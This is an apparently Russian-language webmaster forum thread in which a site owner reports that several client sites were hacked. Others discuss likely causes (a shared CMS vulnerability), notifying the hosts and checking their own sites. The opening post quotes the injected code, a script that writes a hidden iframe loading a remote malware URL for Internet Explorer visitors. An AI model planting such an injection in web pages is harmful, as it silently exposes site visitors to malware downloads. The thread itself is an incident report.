Взломали несколько клиентских сайтов

12
Sayros
На сайте с 01.05.2006
Offline
50
798

Такая тут проблема возникла - взломали несколько сайтов, принадлежащих одному юридическому лицу. Расположены на разных хостингах. Два даже еще не раскручивались.

Бэкап заказан, повреждения восстановим.

Обращает внимание, что все сайты - одного юридического лица, есть маленькая вероятность, что дейсвтия были предприняты по отношению к нему. Стоит ли куда-нибудь обращаться?

На все сайты был внедерен вот такой вот код -

<!--start_frame--//><script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') != -1) { document.writeln('<iframe src="http://spfam.ru/zaraza/get.php" frameborder=0 border=0 width=0 height=0 style="display: none"></iframe>'); }</script><!--end_frame--//>

505 44 38
Lupus
На сайте с 02.11.2002
Offline
241
#1
Sayros:
есть маленькая вероятность, что дейсвтия были предприняты по отношению к нему

Не думаю. Скорее всего там один движок с уязвимостью. Да и внедрение такого кода очень распространено.

There are two types of people in this world: 1. Those who can extrapolate from incomplete data.
Sayros
На сайте с 01.05.2006
Offline
50
#2
Lupus:
Не думаю. Скорее всего там один движок с уязвимостью. Да и внедрение такого кода очень распространено.

На двух сайтах RunCMS чуть-чуть поправленная, на другом - статика.

+ два сайта на Битриксе. лежащие на той же площадке, около 2х часов показывали спонтанно 500 ошибку.

AC
На сайте с 19.11.2004
Offline
88
#3

Если хоститесь на Valuehost - то не переживайте, не вам одним вставили такую строку в Index.html

Если не на Валуе - то значит какая-то общая дыра эксплуатируется.

Sayros
На сайте с 01.05.2006
Offline
50
#4

Петерхост и хт-системс:))

Спасибо всем за ответ!

Deni
На сайте с 15.04.2006
Offline
355
#5
Sayros:
Петерхост и хт-системс:))
Спасибо всем за ответ!

Хостер был поставлен в известность?

Просто у меня на хт-системс много сайтов лежит......... Пошел проверять....

Sayros
На сайте с 01.05.2006
Offline
50
#6

Хостер уведомлен, но они отсылают к логам, а там пусто.

ExcelioN
На сайте с 13.08.2006
Offline
55
#7

А зачем хостеру логи если итак все понятно?

Deni
На сайте с 15.04.2006
Offline
355
#8
Sayros:
Хостер уведомлен, но они отсылают к логам, а там пусто.

Что значит пусто?

Пустые логи или ничего интересного не обнаружено?

Sayros
На сайте с 01.05.2006
Offline
50
#9

В смысле, что ничего интересного не нашел.

cscope
На сайте с 13.02.2005
Offline
525
#10

У меня на хт-системс почти все сайты.

А как проявляется взлом(сайты вроде нормально работают) ?

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий